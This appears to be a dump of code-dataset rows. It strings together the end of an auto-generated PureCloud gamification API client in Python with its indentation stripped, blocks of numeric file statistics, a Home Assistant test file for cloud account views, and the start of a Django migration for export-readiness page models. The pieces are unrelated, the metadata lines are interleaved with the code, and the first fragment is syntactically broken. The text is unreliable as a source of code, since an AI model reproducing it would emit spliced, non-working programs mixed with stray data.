# verify the required parameter 'performance_profile_id' is set
if ('performance_profile_id' not in params) or (params['performance_profile_id'] is None):
raise ValueError("Missing the required parameter `performance_profile_id` when calling `put_gamification_profile`")
resource_path = '/api/v2/gamification/profiles/{performanceProfileId}'.replace('{format}', 'json')
path_params = {}
if 'performance_profile_id' in params:
path_params['performanceProfileId'] = params['performance_profile_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PerformanceProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_gamification_status(self, status, **kwargs):
"""
Update gamification activation status
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_gamification_status(status, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GamificationStatus status: Gamification status (required)
:return: GamificationStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['status']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_gamification_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'status' is set
if ('status' not in params) or (params['status'] is None):
raise ValueError("Missing the required parameter `status` when calling `put_gamification_status`")
resource_path = '/api/v2/gamification/status'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'status' in params:
body_params = params['status']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GamificationStatus',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 41.700774
| 161
| 0.566642
| 11,757
| 118,597
| 5.509569
| 0.024581
| 0.037792
| 0.021073
| 0.019946
| 0.957531
| 0.94921
| 0.941429
| 0.934636
| 0.922703
| 0.915432
| 0
| 0.001941
| 0.352614
| 118,597
| 2,843
| 162
| 41.715441
| 0.841739
| 0.26902
| 0
| 0.841965
| 0
| 0
| 0.21652
| 0.064614
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02324
| false
| 0
| 0.004648
| 0
| 0.051129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e748de04723a8575b9a965c0fe6426c7e19cdad1
| 118
|
py
|
Python
|
microcoapy/__init__.py
|
ftylitak/microCoAPy
|
703f4c79d4cecf9da095cb6bc926f239800a219d
|
[
"Apache-2.0"
] | 37
|
2019-10-16T10:07:55.000Z
|
2022-02-07T15:25:26.000Z
|
microcoapy/__init__.py
|
ftylitak/microCoAPy
|
703f4c79d4cecf9da095cb6bc926f239800a219d
|
[
"Apache-2.0"
] | 6
|
2019-11-28T09:37:49.000Z
|
2022-02-04T11:45:14.000Z
|
microcoapy/__init__.py
|
ftylitak/microCoAPy
|
703f4c79d4cecf9da095cb6bc926f239800a219d
|
[
"Apache-2.0"
] | 7
|
2020-11-10T13:25:17.000Z
|
2022-02-03T10:22:50.000Z
|
from .microcoapy import Coap
from .coap_macros import COAP_CONTENT_FORMAT
from .coap_macros import COAP_RESPONSE_CODE
| 29.5
| 44
| 0.872881
| 18
| 118
| 5.388889
| 0.5
| 0.309278
| 0.28866
| 0.412371
| 0.494845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 45
| 39.333333
| 0.915094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e79f23c0845b33b8672a9095174ea682adaa3cbd
| 11,328
|
py
|
Python
|
tests/components/cloud/test_http_api.py
|
cyrus19901/Homeassistant-updated
|
26ed3ac6187179739a8e0e98b4b7060272efb906
|
[
"Apache-2.0"
] | 1
|
2020-08-06T00:03:02.000Z
|
2020-08-06T00:03:02.000Z
|
tests/components/cloud/test_http_api.py
|
icovada/home-assistant
|
25e6d694e1acab5a870890e594d0bbd48fc80135
|
[
"Apache-2.0"
] | null | null | null |
tests/components/cloud/test_http_api.py
|
icovada/home-assistant
|
25e6d694e1acab5a870890e594d0bbd48fc80135
|
[
"Apache-2.0"
] | 1
|
2019-09-15T04:45:12.000Z
|
2019-09-15T04:45:12.000Z
|
"""Tests for the HTTP API for the cloud component."""
import asyncio
from unittest.mock import patch, MagicMock
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components.cloud import DOMAIN, auth_api
@pytest.fixture
def cloud_client(hass, test_client):
"""Fixture that can fetch from the cloud client."""
hass.loop.run_until_complete(async_setup_component(hass, 'cloud', {
'cloud': {
'mode': 'development'
}
}))
return hass.loop.run_until_complete(test_client(hass.http.app))
@pytest.fixture
def mock_auth(cloud_client, hass):
"""Fixture to mock authentication."""
auth = hass.data[DOMAIN]['auth'] = MagicMock()
return auth
@pytest.fixture
def mock_cognito():
"""Mock warrant."""
with patch('homeassistant.components.cloud.auth_api._cognito') as mock_cog:
yield mock_cog()
@asyncio.coroutine
def test_account_view_no_account(cloud_client):
"""Test fetching account if no account available."""
req = yield from cloud_client.get('/api/cloud/account')
assert req.status == 400
@asyncio.coroutine
def test_account_view(mock_auth, cloud_client):
"""Test fetching account if no account available."""
mock_auth.account = MagicMock(email='hello@home-assistant.io')
req = yield from cloud_client.get('/api/cloud/account')
assert req.status == 200
result = yield from req.json()
assert result == {'email': 'hello@home-assistant.io'}
@asyncio.coroutine
def test_login_view(mock_auth, cloud_client):
"""Test logging in."""
mock_auth.account = MagicMock(email='hello@home-assistant.io')
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 200
result = yield from req.json()
assert result == {'email': 'hello@home-assistant.io'}
assert len(mock_auth.login.mock_calls) == 1
result_user, result_pass = mock_auth.login.mock_calls[0][1]
assert result_user == 'my_username'
assert result_pass == 'my_password'
@asyncio.coroutine
def test_login_view_invalid_json(mock_auth, cloud_client):
"""Try logging in with invalid JSON."""
req = yield from cloud_client.post('/api/cloud/login', data='Not JSON')
assert req.status == 400
assert len(mock_auth.mock_calls) == 0
@asyncio.coroutine
def test_login_view_invalid_schema(mock_auth, cloud_client):
"""Try logging in with invalid schema."""
req = yield from cloud_client.post('/api/cloud/login', json={
'invalid': 'schema'
})
assert req.status == 400
assert len(mock_auth.mock_calls) == 0
@asyncio.coroutine
def test_login_view_request_timeout(mock_auth, cloud_client):
"""Test request timeout while trying to log in."""
mock_auth.login.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 502
@asyncio.coroutine
def test_login_view_invalid_credentials(mock_auth, cloud_client):
"""Test logging in with invalid credentials."""
mock_auth.login.side_effect = auth_api.Unauthenticated
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 401
@asyncio.coroutine
def test_login_view_unknown_error(mock_auth, cloud_client):
"""Test unknown error while logging in."""
mock_auth.login.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 502
@asyncio.coroutine
def test_logout_view(mock_auth, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/logout')
assert req.status == 200
data = yield from req.json()
assert data == {'message': 'ok'}
assert len(mock_auth.logout.mock_calls) == 1
@asyncio.coroutine
def test_logout_view_request_timeout(mock_auth, cloud_client):
"""Test timeout while logging out."""
mock_auth.logout.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/logout')
assert req.status == 502
@asyncio.coroutine
def test_logout_view_unknown_error(mock_auth, cloud_client):
"""Test unknown error while logging out."""
mock_auth.logout.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/logout')
assert req.status == 502
@asyncio.coroutine
def test_register_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'password': 'falcon42'
})
assert req.status == 200
assert len(mock_cognito.register.mock_calls) == 1
result_email, result_pass = mock_cognito.register.mock_calls[0][1]
assert result_email == 'hello@bla.com'
assert result_pass == 'falcon42'
@asyncio.coroutine
def test_register_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'not_password': 'falcon'
})
assert req.status == 400
assert len(mock_cognito.logout.mock_calls) == 0
@asyncio.coroutine
def test_register_view_request_timeout(mock_cognito, cloud_client):
"""Test timeout while logging out."""
mock_cognito.register.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'password': 'falcon42'
})
assert req.status == 502
@asyncio.coroutine
def test_register_view_unknown_error(mock_cognito, cloud_client):
"""Test unknown error while logging out."""
mock_cognito.register.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'password': 'falcon42'
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_register_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'confirmation_code': '123456'
})
assert req.status == 200
assert len(mock_cognito.confirm_sign_up.mock_calls) == 1
result_code, result_email = mock_cognito.confirm_sign_up.mock_calls[0][1]
assert result_email == 'hello@bla.com'
assert result_code == '123456'
@asyncio.coroutine
def test_confirm_register_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'not_confirmation_code': '123456'
})
assert req.status == 400
assert len(mock_cognito.confirm_sign_up.mock_calls) == 0
@asyncio.coroutine
def test_confirm_register_view_request_timeout(mock_cognito, cloud_client):
"""Test timeout while logging out."""
mock_cognito.confirm_sign_up.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'confirmation_code': '123456'
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_register_view_unknown_error(mock_cognito, cloud_client):
"""Test unknown error while logging out."""
mock_cognito.confirm_sign_up.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'confirmation_code': '123456'
})
assert req.status == 502
@asyncio.coroutine
def test_forgot_password_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'email': 'hello@bla.com',
})
assert req.status == 200
assert len(mock_cognito.initiate_forgot_password.mock_calls) == 1
@asyncio.coroutine
def test_forgot_password_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'not_email': 'hello@bla.com',
})
assert req.status == 400
assert len(mock_cognito.initiate_forgot_password.mock_calls) == 0
@asyncio.coroutine
def test_forgot_password_view_request_timeout(mock_cognito, cloud_client):
"""Test timeout while logging out."""
mock_cognito.initiate_forgot_password.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'email': 'hello@bla.com',
})
assert req.status == 502
@asyncio.coroutine
def test_forgot_password_view_unknown_error(mock_cognito, cloud_client):
"""Test unknown error while logging out."""
mock_cognito.initiate_forgot_password.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'email': 'hello@bla.com',
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_forgot_password_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 200
assert len(mock_cognito.confirm_forgot_password.mock_calls) == 1
result_code, result_new_password = \
mock_cognito.confirm_forgot_password.mock_calls[0][1]
assert result_code == '123456'
assert result_new_password == 'hello2'
@asyncio.coroutine
def test_confirm_forgot_password_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'not_confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 400
assert len(mock_cognito.confirm_forgot_password.mock_calls) == 0
@asyncio.coroutine
def test_confirm_forgot_password_view_request_timeout(mock_cognito,
cloud_client):
"""Test timeout while logging out."""
mock_cognito.confirm_forgot_password.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_forgot_password_view_unknown_error(mock_cognito,
cloud_client):
"""Test unknown error while logging out."""
mock_cognito.confirm_forgot_password.side_effect = auth_api.UnknownError
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 502
| 33.219941
| 79
| 0.690237
| 1,454
| 11,328
| 5.127235
| 0.081843
| 0.084105
| 0.068813
| 0.0833
| 0.873508
| 0.854594
| 0.821328
| 0.778404
| 0.730651
| 0.640241
| 0
| 0.018903
| 0.187412
| 11,328
| 340
| 80
| 33.317647
| 0.790983
| 0.084393
| 0
| 0.646091
| 0
| 0
| 0.161707
| 0.051879
| 0
| 0
| 0
| 0
| 0.205761
| 1
| 0.123457
| false
| 0.176955
| 0.020576
| 0
| 0.152263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e7b95a3d63e912757e682ffbf7cf207894c51cad
| 35,573
|
py
|
Python
|
export_readiness/migrations/0031_internationallandingpage_squashed_0050_auto_20190219_1633.py
|
kaedroho/dit-directory-cms
|
67c15eeed19e7b3583f1fce1969230ddf83b6813
|
[
"MIT"
] | 6
|
2018-03-20T11:19:07.000Z
|
2021-10-05T07:53:11.000Z
|
export_readiness/migrations/0031_internationallandingpage_squashed_0050_auto_20190219_1633.py
|
kaedroho/dit-directory-cms
|
67c15eeed19e7b3583f1fce1969230ddf83b6813
|
[
"MIT"
] | 802
|
2018-02-05T14:16:13.000Z
|
2022-02-10T10:59:21.000Z
|
export_readiness/migrations/0031_internationallandingpage_squashed_0050_auto_20190219_1633.py
|
kaedroho/dit-directory-cms
|
67c15eeed19e7b3583f1fce1969230ddf83b6813
|
[
"MIT"
] | 6
|
2019-01-22T13:19:37.000Z
|
2019-07-01T10:35:26.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-07 10:11
from __future__ import unicode_literals
import core.model_fields
import core.models
import core.validators
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
replaces = [('export_readiness', '0031_internationallandingpage'), ('export_readiness', '0032_auto_20181012_1507'), ('export_readiness', '0033_auto_20181023_1600'), ('export_readiness', '0034_auto_20181024_1112'), ('export_readiness', '0035_contactusguidance'), ('export_readiness', '0036_auto_20181105_1258'), ('export_readiness', '0037_auto_20181106_0952'), ('export_readiness', '0038_auto_20181106_0953'), ('export_readiness', '0039_contactsuccesspage_topic'), ('export_readiness', '0040_auto_20181121_1643'), ('export_readiness', '0041_campaignpage_marketingpages'), ('export_readiness', '0042_contactsuccesspages_contactusguidancepages'), ('export_readiness', '0043_auto_20181205_1413'), ('export_readiness', '0044_auto_20181214_1605'), ('export_readiness', '0045_auto_20190115_1058'), ('export_readiness', '0046_euexitformpages'), ('export_readiness', '0047_allcontactpagespage'), ('export_readiness', '0048_auto_20190206_1355'), ('export_readiness', '0049_auto_20190207_0924'), ('export_readiness', '0050_auto_20190219_1633')]
dependencies = [
('export_readiness', '0020_articlelistingpage_articlepage_topiclandingpage_squashed_0030_auto_20181005_1449'),
('wagtailimages', '0021_image_file_hash'),
('wagtailforms', '0003_capitalizeverbose'),
('wagtailcore', '0040_page_draft_title'),
]
operations = [
migrations.CreateModel(
name='InternationalLandingPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.AlterField(
model_name='articlepage',
name='tags',
field=modelcluster.fields.ParentalManyToManyField(blank=True, to='export_readiness.Tag'),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='body_text',
field=core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks]),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='heading',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='submit_button_text',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='body_text',
field=core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks]),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='heading',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='submit_button_text',
field=models.CharField(max_length=50),
),
migrations.AddField(
model_name='euexitdomesticformpage',
name='disclaimer',
field=models.TextField(default='', max_length=500),
preserve_default=False,
),
migrations.AddField(
model_name='euexitinternationalformpage',
name='disclaimer',
field=models.TextField(default='', max_length=500),
preserve_default=False,
),
migrations.AlterField(
model_name='articlelistingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='articlepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='deprecatedgetfinancepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitformsuccesspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='exportreadinessapp',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='homepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='newgetfinancepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardnotespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='privacyandcookiespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='termsandconditionspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='topiclandingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.CreateModel(
name='ContactUsGuidancePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
('topic', models.TextField(choices=[('alerts-not-relevant', 'Guidance - Daily alerts are not relevant'), ('opportunity-no-response', 'Guidance - Export Opportunity application no response'), ('no-verification-email', 'Guidance - Email verification missing'), ('password-reset', 'Guidance - Missing password reset link'), ('companies-house-login', 'Guidance - Companies House login not working'), ('verification-letter-code', 'Guidance - Where to enter letter verification code'), ('no-verification-letter', 'Guidance - Verification letter not delivered'), ('verification-missing', 'Guidance - Verification code not delivered'), ('company-not-found', 'Guidance - Company not found')], help_text='The slug and CMS page title are inferred from the topic', unique=True)),
('body', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ContactSuccessPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
('heading', models.CharField(max_length=255, verbose_name='Title')),
('body_text', models.CharField(max_length=255, verbose_name='Body text')),
('next_title', models.CharField(max_length=255, verbose_name='Title')),
('next_body_text', models.CharField(max_length=255, verbose_name='Body text')),
('topic', models.TextField(choices=[('contact-success-form', 'Contact domestic form success'), ('contact-events-success-form', 'Contact Events form success'), ('contact-dso-success-form', 'Contact Defence and Security Organisation form success'), ('contact-export-advice-success-form', 'Contact exporting from the UK form success'), ('contact-feedback-success-form', 'Contact feedback form success'), ('contact-find-companies-success-form', 'Contact find UK companies form success'), ('contact-international-success-form', 'Contact international form success'), ('contact-soo-success-form', 'Contact Selling Online Overseas form success')], help_text='The slug and CMS page title are inferred from the topic', unique=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.RemoveField(
model_name='deprecatedgetfinancepage',
name='banner_image',
),
migrations.RemoveField(
model_name='deprecatedgetfinancepage',
name='page_ptr',
),
migrations.RemoveField(
model_name='deprecatedgetfinancepage',
name='ukef_logo',
),
migrations.DeleteModel(
name='DeprecatedGetFinancePage',
),
migrations.RenameModel(
old_name='NewGetFinancePage',
new_name='GetFinancePage',
),
migrations.CreateModel(
name='CampaignPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True)),
('campaign_heading', models.CharField(max_length=255)),
('section_one_heading', models.CharField(max_length=255)),
('section_one_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_one_heading', models.CharField(max_length=255)),
('selling_point_one_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_two_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_two_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('selling_point_three_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_three_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('section_one_contact_button_url', models.CharField(blank=True, max_length=255, null=True)),
('section_one_contact_button_text', models.CharField(blank=True, max_length=255, null=True)),
('section_two_heading', models.CharField(max_length=255)),
('section_two_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('section_two_contact_button_url', models.CharField(blank=True, max_length=255, null=True)),
('section_two_contact_button_text', models.CharField(blank=True, max_length=255, null=True)),
('related_content_heading', models.CharField(max_length=255)),
('related_content_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('cta_box_message', models.CharField(max_length=255)),
('cta_box_button_url', models.CharField(max_length=255)),
('cta_box_button_text', models.CharField(max_length=255)),
('campaign_hero_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('section_one_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('section_two_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('selling_point_one_icon', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('selling_point_three_icon', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('selling_point_two_icon', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MarketingPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='ContactSuccessPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
